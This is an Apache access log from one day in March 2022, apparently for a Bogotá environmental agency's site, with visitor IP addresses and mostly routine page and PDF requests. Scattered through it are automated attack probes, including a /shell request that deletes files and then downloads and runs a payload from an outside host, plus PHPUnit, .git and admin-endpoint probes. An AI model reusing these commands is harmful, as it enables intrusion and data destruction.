191.156.177.230 - - [21/Mar/2022:11:43:44 -0500] "GET /dia-mundial-del-agua-programese-para-participar-de-las-actividades-en-torno-a-esta-conmemoracion.html HTTP/1.1" 304 -
201.245.192.253 - - [21/Mar/2022:11:45:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115394
190.158.204.9 - - [21/Mar/2022:11:45:58 -0500] "GET /humedales-por-que-son-importantes-en-epoca-de-lluvia.html HTTP/1.1" 200 793
216.245.221.92 - - [21/Mar/2022:11:47:11 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.45 - - [21/Mar/2022:11:48:00 -0500] "-" 408 -
190.26.11.52 - - [21/Mar/2022:11:48:27 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 4258
190.26.11.52 - - [21/Mar/2022:11:48:29 -0500] "GET /BLA/resoluciones/AUTOS%202022/0009.pdf HTTP/1.1" 200 389921
190.26.11.52 - - [21/Mar/2022:11:48:38 -0500] "GET /BLA/resoluciones/AUTOS%202022/0033.pdf HTTP/1.1" 200 342461
190.26.11.52 - - [21/Mar/2022:11:48:42 -0500] "GET /BLA/resoluciones/AUTOS%202022/0113.pdf HTTP/1.1" 200 381771
157.55.39.218 - - [21/Mar/2022:11:50:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/1578.pdf HTTP/1.1" 304 -
190.26.11.52 - - [21/Mar/2022:11:50:32 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
190.26.11.52 - - [21/Mar/2022:11:50:35 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2010%2F HTTP/1.1" 200 272700
40.77.167.46 - - [21/Mar/2022:11:50:37 -0500] "GET /bla/resoluciones/resoluciones%202021/5648.pdf HTTP/1.1" 200 423381
173.252.95.19 - - [21/Mar/2022:11:51:43 -0500] "GET /alcaldesa-presenta-a-la-comunidad-de-kennedy-y-bosa-la-nueva-reserva-de-humedal-tingua-azul.html HTTP/1.1" 206 1066
173.252.95.24 - - [21/Mar/2022:11:51:43 -0500] "GET /alcaldesa-presenta-a-la-comunidad-de-kennedy-y-bosa-la-nueva-reserva-de-humedal-tingua-azul.html HTTP/1.1" 206 1066
173.252.107.120 - - [21/Mar/2022:11:51:44 -0500] "GET /images/humedal-tingua-azul-ecosistema-20-enero.jpg HTTP/1.1" 200 188709
190.25.110.217 - - [21/Mar/2022:11:52:02 -0500] "GET /oso-melero-recuperado-por-bomberos-es-atendido-por-profesionales-de-la-secretaria-de-ambiente.html HTTP/1.1" 200 1084
200.91.235.186 - - [21/Mar/2022:11:52:05 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
200.91.235.186 - - [21/Mar/2022:11:52:08 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2018%2F HTTP/1.1" 200 258002
216.245.221.92 - - [21/Mar/2022:11:52:11 -0500] "HEAD / HTTP/1.1" 200 -
186.102.47.70 - - [21/Mar/2022:11:52:42 -0500] "GET /dia-mundial-del-agua-programese-para-participar-de-las-actividades-en-torno-a-esta-conmemoracion.html HTTP/1.1" 200 1039
201.245.192.253 - - [21/Mar/2022:11:52:49 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115394
190.26.11.52 - - [21/Mar/2022:11:54:51 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 329069
190.26.11.52 - - [21/Mar/2022:11:55:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/5690.pdf HTTP/1.1" 200 356777
190.26.11.52 - - [21/Mar/2022:11:56:41 -0500] "GET /BLA/resoluciones/AUTOS%202020/2868.pdf HTTP/1.1" 200 381408
216.245.221.92 - - [21/Mar/2022:11:57:11 -0500] "HEAD / HTTP/1.1" 200 -
190.26.11.52 - - [21/Mar/2022:11:57:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0009.pdf HTTP/1.1" 200 366337
157.55.39.218 - - [21/Mar/2022:11:57:26 -0500] "GET /bla/resoluciones/resoluciones%202021/3872.pdf HTTP/1.1" 200 727982
186.155.80.247 - - [21/Mar/2022:11:57:33 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.155.80.247 - - [21/Mar/2022:11:57:33 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.155.80.247 - - [21/Mar/2022:11:57:36 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 290979
190.26.145.153 - - [21/Mar/2022:11:58:10 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
190.26.145.153 - - [21/Mar/2022:11:58:42 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 339392
190.26.11.52 - - [21/Mar/2022:11:59:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/5589.pdf HTTP/1.1" 200 384014
190.26.14.37 - - [21/Mar/2022:11:59:17 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
190.26.14.37 - - [21/Mar/2022:11:59:17 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
190.26.14.37 - - [21/Mar/2022:11:59:17 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
190.26.14.37 - - [21/Mar/2022:11:59:18 -0500] "GET /autoliquidacion2020 HTTP/1.1" 301 250
190.26.14.37 - - [21/Mar/2022:11:59:18 -0500] "GET /autoliquidacion2020/ HTTP/1.1" 200 6146
190.26.14.37 - - [21/Mar/2022:11:59:19 -0500] "GET /autoliquidacion2020/dlf/styles.css HTTP/1.1" 200 3045
190.26.14.37 - - [21/Mar/2022:11:59:19 -0500] "GET /autoliquidacion2020/dlf/folder.png HTTP/1.1" 200 410
190.26.14.37 - - [21/Mar/2022:11:59:19 -0500] "GET /autoliquidacion2020/dlf/bg.gif HTTP/1.1" 200 54
190.26.14.37 - - [21/Mar/2022:11:59:25 -0500] "GET /autoliquidacion2020/index.php?dir=Grupo+Forestal+-+Silvicultura%2F HTTP/1.1" 200 2799
190.26.14.37 - - [21/Mar/2022:11:59:26 -0500] "GET /autoliquidacion2020/dlf/dirup.png HTTP/1.1" 200 644
190.26.14.37 - - [21/Mar/2022:11:59:26 -0500] "GET /autoliquidacion2020/dlf/html.gif HTTP/1.1" 200 632
190.26.14.37 - - [21/Mar/2022:11:59:30 -0500] "GET /autoliquidacion2020/index.php?dir=Grupo+Forestal+-+Silvicultura%2FPermiso+o+autorizaci%F3n+para+aprovechamiento+forestal+de+%E1rboles+aislados%2F HTTP/1.1" 200 3777
190.26.14.37 - - [21/Mar/2022:11:59:30 -0500] "GET /autoliquidacion2020/dlf/xls.gif HTTP/1.1" 200 636
190.26.14.37 - - [21/Mar/2022:11:59:30 -0500] "GET /autoliquidacion2020/dlf/unknown.png HTTP/1.1" 200 266
190.26.11.52 - - [21/Mar/2022:11:59:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/1836.pdf HTTP/1.1" 200 402149
190.26.14.37 - - [21/Mar/2022:11:59:38 -0500] "GET /autoliquidacion2020/Grupo%20Forestal%20-%20Silvicultura/Permiso%20o%20autorizaci%C3%B3n%20para%20aprovechamiento%20forestal%20de%20%C3%A1rboles%20aislados/PM04-PR30-F1%20Formulario%20de%20solicitud%20de%20manejo%20o%20aprovechamiento%20forestal.xlsx HTTP/1.1" 200 69007
181.62.28.233 - - [21/Mar/2022:12:01:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0016.pdf HTTP/1.1" 200 429909
181.62.28.233 - - [21/Mar/2022:12:01:22 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
216.245.221.92 - - [21/Mar/2022:12:02:11 -0500] "HEAD / HTTP/1.1" 200 -
212.192.246.29 - - [21/Mar/2022:12:02:31 -0500] "GET / HTTP/1.1" 200 319
212.192.246.29 - - [21/Mar/2022:12:02:33 -0500] "POST /HNAP1/ HTTP/1.1" 404 1018
217.182.171.12 - - [21/Mar/2022:12:04:01 -0500] "HEAD /BLA/resoluciones/AUTOS%202011/2614.pdf HTTP/1.1" 200 -
200.13.246.2 - - [21/Mar/2022:12:05:01 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
200.13.246.2 - - [21/Mar/2022:12:05:01 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
200.13.246.2 - - [21/Mar/2022:12:05:01 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
90.148.134.6 - - [21/Mar/2022:12:05:42 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.20.109/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
216.245.221.92 - - [21/Mar/2022:12:07:11 -0500] "HEAD / HTTP/1.1" 200 -
45.146.165.37 - - [21/Mar/2022:12:08:37 -0500] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
201.245.192.253 - - [21/Mar/2022:12:07:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115790
37.0.8.109 - - [21/Mar/2022:12:09:10 -0500] "GET /config/getuser?index=0 HTTP/1.1" 404 1018
216.245.221.92 - - [21/Mar/2022:12:12:11 -0500] "HEAD / HTTP/1.1" 200 -
200.119.125.218 - - [21/Mar/2022:12:12:38 -0500] "GET /se-abre-convocatoria-a-organizaciones-ambientales-para-generar-1-070-empleos-verdes-dirigidos-a-mujeres.html HTTP/1.1" 200 1128
201.245.192.253 - - [21/Mar/2022:12:11:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115790
191.102.199.80 - - [21/Mar/2022:12:13:20 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
191.102.199.80 - - [21/Mar/2022:12:13:20 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
191.102.199.80 - - [21/Mar/2022:12:13:20 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
190.26.11.52 - - [21/Mar/2022:12:13:32 -0500] "GET /BLA/resoluciones/AUTOS%202020/4877.pdf HTTP/1.1" 200 353320
34.90.207.243 - - [21/Mar/2022:12:15:51 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [21/Mar/2022:12:17:11 -0500] "HEAD / HTTP/1.1" 200 -
45.146.165.37 - - [21/Mar/2022:12:21:48 -0500] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 1018
201.245.192.253 - - [21/Mar/2022:12:21:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44925
216.245.221.92 - - [21/Mar/2022:12:22:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:12:22:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45805
201.245.192.253 - - [21/Mar/2022:12:22:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115790
216.245.221.92 - - [21/Mar/2022:12:27:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:12:31:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44925
216.245.221.92 - - [21/Mar/2022:12:32:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:12:32:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45805
201.245.192.253 - - [21/Mar/2022:12:34:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115790
190.145.207.68 - - [21/Mar/2022:12:35:51 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
190.145.207.68 - - [21/Mar/2022:12:35:51 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 304 -
190.145.207.68 - - [21/Mar/2022:12:35:51 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 304 -
190.145.207.68 - - [21/Mar/2022:12:35:51 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 304 -
190.145.207.68 - - [21/Mar/2022:12:35:59 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 304 -
190.145.207.68 - - [21/Mar/2022:12:35:59 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 304 -
190.145.207.68 - - [21/Mar/2022:12:35:59 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 339392
66.249.70.45 - - [21/Mar/2022:12:36:16 -0500] "-" 408 -
216.245.221.92 - - [21/Mar/2022:12:37:11 -0500] "HEAD / HTTP/1.1" 200 -
186.28.126.38 - - [21/Mar/2022:12:37:50 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.28.126.38 - - [21/Mar/2022:12:37:50 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
186.28.126.38 - - [21/Mar/2022:12:37:50 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
103.161.17.249 - - [21/Mar/2022:12:39:57 -0500] "GET / HTTP/1.1" 200 319
66.249.70.45 - - [21/Mar/2022:12:41:53 -0500] "-" 408 -
201.245.192.253 - - [21/Mar/2022:12:41:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44925
216.245.221.92 - - [21/Mar/2022:12:42:11 -0500] "HEAD / HTTP/1.1" 200 -
181.237.162.52 - - [21/Mar/2022:12:42:38 -0500] "GET /forest/ HTTP/1.1" 200 12041
181.237.162.52 - - [21/Mar/2022:12:42:47 -0500] "POST /forest/index.php HTTP/1.1" 200 12268
201.245.192.253 - - [21/Mar/2022:12:42:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45805
216.245.221.92 - - [21/Mar/2022:12:47:11 -0500] "HEAD / HTTP/1.1" 200 -
3.65.27.28 - - [21/Mar/2022:12:47:53 -0500] "GET /BLA/.git/HEAD HTTP/1.1" 404 1018
201.245.192.253 - - [21/Mar/2022:12:47:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115790
66.249.70.45 - - [21/Mar/2022:12:49:44 -0500] "-" 408 -
216.245.221.92 - - [21/Mar/2022:12:52:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:12:52:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115790
64.31.49.110 - - [21/Mar/2022:12:54:00 -0500] "GET / HTTP/1.1" 200 319
66.249.70.45 - - [21/Mar/2022:12:55:30 -0500] "-" 408 -
216.245.221.92 - - [21/Mar/2022:12:57:11 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.14 - - [21/Mar/2022:12:58:25 -0500] "GET /images/feria-bosa-17-febrero.jpg HTTP/1.1" 200 45917
186.28.243.45 - - [21/Mar/2022:13:00:51 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.28.243.45 - - [21/Mar/2022:13:00:51 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
186.28.243.45 - - [21/Mar/2022:13:00:51 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
66.249.70.45 - - [21/Mar/2022:13:01:09 -0500] "-" 408 -
216.245.221.92 - - [21/Mar/2022:13:02:11 -0500] "HEAD / HTTP/1.1" 200 -
2.184.108.89 - - [21/Mar/2022:13:02:19 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.20.109/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
173.252.87.15 - - [21/Mar/2022:13:02:30 -0500] "GET /images/humedal-agua-lluvias-bogota-18-marzo.jpg HTTP/1.1" 200 146923
207.46.13.179 - - [21/Mar/2022:13:04:44 -0500] "GET /bla/resoluciones/resoluciones%202021/4812.pdf HTTP/1.1" 200 349715
181.56.107.227 - - [21/Mar/2022:13:05:45 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
181.56.107.227 - - [21/Mar/2022:13:05:45 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
181.56.107.227 - - [21/Mar/2022:13:05:45 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
181.56.107.227 - - [21/Mar/2022:13:05:46 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
181.56.107.227 - - [21/Mar/2022:13:05:46 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
181.56.107.227 - - [21/Mar/2022:13:05:46 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
181.56.107.227 - - [21/Mar/2022:13:05:48 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
181.56.107.227 - - [21/Mar/2022:13:05:49 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
181.56.107.227 - - [21/Mar/2022:13:05:49 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
181.56.107.227 - - [21/Mar/2022:13:05:50 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
181.56.107.227 - - [21/Mar/2022:13:05:50 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
181.56.107.227 - - [21/Mar/2022:13:05:50 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
181.56.107.227 - - [21/Mar/2022:13:05:50 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
181.56.107.227 - - [21/Mar/2022:13:05:50 -0500] "GET /galeria/nivo-slider/demo/images/bannertrafico_optimized.jpg HTTP/1.1" 200 42578
181.56.107.227 - - [21/Mar/2022:13:05:50 -0500] "GET /galeria/nivo-slider/demo/images/Bannermujeresquereverdecen.jpg HTTP/1.1" 200 46558
181.56.107.227 - - [21/Mar/2022:13:05:50 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
181.56.107.227 - - [21/Mar/2022:13:05:50 -0500] "GET /galeria/nivo-slider/demo/images/bannertortuga_optimized.jpg HTTP/1.1" 200 39066
181.56.107.227 - - [21/Mar/2022:13:05:50 -0500] "GET /galeria/nivo-slider/demo/images/bannerrutaesperanza.jpg HTTP/1.1" 200 55560
181.56.107.227 - - [21/Mar/2022:13:05:50 -0500] "GET /galeria/nivo-slider/demo/images/Bannersedeelectronica.jpg HTTP/1.1" 200 40383
181.56.107.227 - - [21/Mar/2022:13:05:50 -0500] "GET /galeria/nivo-slider/demo/images/Bannerplasticosseptiembre.jpg HTTP/1.1" 200 45633
181.56.107.227 - - [21/Mar/2022:13:05:50 -0500] "GET /galeria/nivo-slider/demo/images/banneraire2021.jpg HTTP/1.1" 200 265101
181.56.107.227 - - [21/Mar/2022:13:05:51 -0500] "GET /galeria/nivo-slider/demo/images/Bannervirtualescanales.jpg HTTP/1.1" 200 174544
181.56.107.227 - - [21/Mar/2022:13:05:51 -0500] "GET /galeria/nivo-slider/demo/images/Bannerenvases.jpg HTTP/1.1" 200 37316
181.56.107.227 - - [21/Mar/2022:13:05:51 -0500] "GET /galeria/nivo-slider/demo/images/bannerresiduoshospitalariosagosto.jpg HTTP/1.1" 200 36499
181.56.107.227 - - [21/Mar/2022:13:05:51 -0500] "GET /galeria/nivo-slider/demo/images/bannercapacitacionesbogota.jpg HTTP/1.1" 200 42416
181.56.107.227 - - [21/Mar/2022:13:05:51 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopular.jpeg HTTP/1.1" 200 41707
181.56.107.227 - - [21/Mar/2022:13:05:51 -0500] "GET /galeria/nivo-slider/demo/images/bannerclases2021.jpg HTTP/1.1" 200 68230
181.56.107.227 - - [21/Mar/2022:13:05:51 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopularcrr68.jpg HTTP/1.1" 200 51887
181.56.107.227 - - [21/Mar/2022:13:05:51 -0500] "GET /galeria/nivo-slider/demo/images/4Simple_Slider.png HTTP/1.1" 200 11722
181.56.107.227 - - [21/Mar/2022:13:05:51 -0500] "GET /galeria/nivo-slider/themes/default/loading.gif HTTP/1.1" 200 1737
181.56.107.227 - - [21/Mar/2022:13:05:52 -0500] "GET /galeria/nivo-slider/themes/default/arrows.png HTTP/1.1" 200 824
181.56.107.227 - - [21/Mar/2022:13:05:52 -0500] "GET /galeria/nivo-slider/themes/default/bullets.png HTTP/1.1" 200 1281
201.245.192.253 - - [21/Mar/2022:13:05:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
66.249.70.45 - - [21/Mar/2022:13:06:48 -0500] "-" 408 -
216.245.221.92 - - [21/Mar/2022:13:07:11 -0500] "HEAD / HTTP/1.1" 200 -
35.222.90.178 - - [21/Mar/2022:13:10:09 -0500] "\x16\x03\x01" 400 226
35.222.90.178 - - [21/Mar/2022:13:10:15 -0500] "OPTIONS / HTTP/1.0" 200 -
64.31.49.110 - - [21/Mar/2022:13:11:34 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [21/Mar/2022:13:12:11 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.45 - - [21/Mar/2022:13:12:29 -0500] "-" 408 -
173.252.87.24 - - [21/Mar/2022:13:13:43 -0500] "GET /images/humedal-agua-lluvias-bogota-18-marzo.jpg HTTP/1.1" 200 146923
186.155.80.247 - - [21/Mar/2022:13:14:11 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.155.80.247 - - [21/Mar/2022:13:14:14 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 873085
186.155.80.247 - - [21/Mar/2022:13:14:16 -0500] "GET /BLA/resoluciones/dlf/unknown.png HTTP/1.1" 200 266
216.245.221.92 - - [21/Mar/2022:13:17:11 -0500] "HEAD / HTTP/1.1" 200 -
5.255.253.150 - - [21/Mar/2022:13:17:49 -0500] "-" 408 -
95.108.213.58 - - [21/Mar/2022:13:17:54 -0500] "-" 408 -
87.250.224.11 - - [21/Mar/2022:13:17:59 -0500] "-" 408 -
186.155.80.247 - - [21/Mar/2022:13:18:03 -0500] "GET /BLA/resoluciones/AUTOS%202014/3504.pdf HTTP/1.1" 200 795244
87.250.224.86 - - [21/Mar/2022:13:18:05 -0500] "-" 408 -
87.250.224.110 - - [21/Mar/2022:13:18:20 -0500] "-" 408 -
5.45.207.70 - - [21/Mar/2022:13:18:35 -0500] "-" 408 -
5.255.253.182 - - [21/Mar/2022:13:19:05 -0500] "-" 408 -
45.146.165.37 - - [21/Mar/2022:13:19:26 -0500] "-" 408 -
201.245.192.253 - - [21/Mar/2022:13:18:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115788
87.250.224.128 - - [21/Mar/2022:13:20:05 -0500] "-" 408 -
87.250.224.111 - - [21/Mar/2022:13:21:05 -0500] "-" 408 -
201.245.192.253 - - [21/Mar/2022:13:21:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45791
216.245.221.92 - - [21/Mar/2022:13:22:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:13:22:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45803
5.45.207.139 - - [21/Mar/2022:13:23:05 -0500] "-" 408 -
191.156.186.201 - - [21/Mar/2022:13:23:44 -0500] "-" 408 -
201.245.192.253 - - [21/Mar/2022:13:23:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115788
66.220.149.118 - - [21/Mar/2022:13:25:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2228.pdf HTTP/1.1" 206 340571
66.220.149.116 - - [21/Mar/2022:13:25:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2228.pdf HTTP/1.1" 206 340571
87.250.224.194 - - [21/Mar/2022:13:26:05 -0500] "-" 408 -
200.91.235.186 - - [21/Mar/2022:13:26:16 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2015%2F HTTP/1.1" 200 576181
200.91.235.186 - - [21/Mar/2022:13:26:18 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2015%2F HTTP/1.1" 200 576181
200.91.235.186 - - [21/Mar/2022:13:26:18 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2015%2F HTTP/1.1" 200 576181
200.91.235.186 - - [21/Mar/2022:13:26:21 -0500] "GET /BLA/resoluciones/dlf/unknown.png HTTP/1.1" 200 266
66.220.149.7 - - [21/Mar/2022:13:26:56 -0500] "GET /images/pieza-crecimiento-verde-27-enero.jpg HTTP/1.1" 200 28291
103.178.236.102 - - [21/Mar/2022:13:27:09 -0500] "GET /dispatch.asp HTTP/1.1" 404 1018
186.28.16.136 - - [21/Mar/2022:13:27:10 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
216.245.221.92 - - [21/Mar/2022:13:27:11 -0500] "HEAD / HTTP/1.1" 200 -
69.171.231.113 - - [21/Mar/2022:13:27:32 -0500] "GET /images/bogota-economia-circular-7-febrero.jpg HTTP/1.1" 200 51473
66.249.70.45 - - [21/Mar/2022:13:27:59 -0500] "-" 408 -
186.155.46.78 - - [21/Mar/2022:13:28:13 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.155.46.78 - - [21/Mar/2022:13:28:17 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 329069
173.252.107.14 - - [21/Mar/2022:13:28:33 -0500] "GET /images/humedal-observatorio-26-febrero.jpg HTTP/1.1" 200 21641
173.252.87.18 - - [21/Mar/2022:13:28:33 -0500] "GET /images/feria-servicios-atencion-24-febrero.jpg HTTP/1.1" 200 31800
186.155.46.78 - - [21/Mar/2022:13:28:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/5274.pdf HTTP/1.1" 200 402722
186.86.32.127 - - [21/Mar/2022:13:31:46 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
191.157.74.82 - - [21/Mar/2022:13:31:51 -0500] "GET /dia-mundial-del-agua-cambio-de-habitos-y-una-mayor-conciencia-son-claves-para-proteger-el-recurso-hidrico.html HTTP/1.1" 206 958
191.157.74.82 - - [21/Mar/2022:13:31:51 -0500] "GET /images/pieza-dia-mundial-agua.JPG.jpg HTTP/1.1" 206 68485
201.245.192.253 - - [21/Mar/2022:13:31:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45791
201.245.192.253 - - [21/Mar/2022:13:32:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [21/Mar/2022:13:32:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:13:32:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45803
207.46.13.157 - - [21/Mar/2022:13:33:32 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
66.249.70.45 - - [21/Mar/2022:13:34:27 -0500] "-" 408 -
201.245.192.253 - - [21/Mar/2022:13:34:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115788
216.245.221.92 - - [21/Mar/2022:13:37:11 -0500] "HEAD / HTTP/1.1" 200 -
186.29.11.9 - - [21/Mar/2022:13:38:21 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.29.11.9 - - [21/Mar/2022:13:38:31 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2009%2F HTTP/1.1" 200 399207
186.80.59.111 - - [21/Mar/2022:13:38:39 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.80.59.111 - - [21/Mar/2022:13:38:44 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+1999%2F HTTP/1.1" 200 10038
186.80.59.111 - - [21/Mar/2022:13:39:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%201999/RESOLUCION%20819%20DE%201999.pdf HTTP/1.1" 200 100370
186.80.59.111 - - [21/Mar/2022:13:39:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%201999/RESOLUCION%20819%20DE%201999.pdf HTTP/1.1" 206 1
186.80.59.111 - - [21/Mar/2022:13:39:53 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.80.59.111 - - [21/Mar/2022:13:39:57 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+1999%2F HTTP/1.1" 200 10038
201.245.192.253 - - [21/Mar/2022:13:41:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45791
216.245.221.92 - - [21/Mar/2022:13:42:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:13:42:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45803
186.159.7.236 - - [21/Mar/2022:13:43:19 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [21/Mar/2022:13:46:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115788
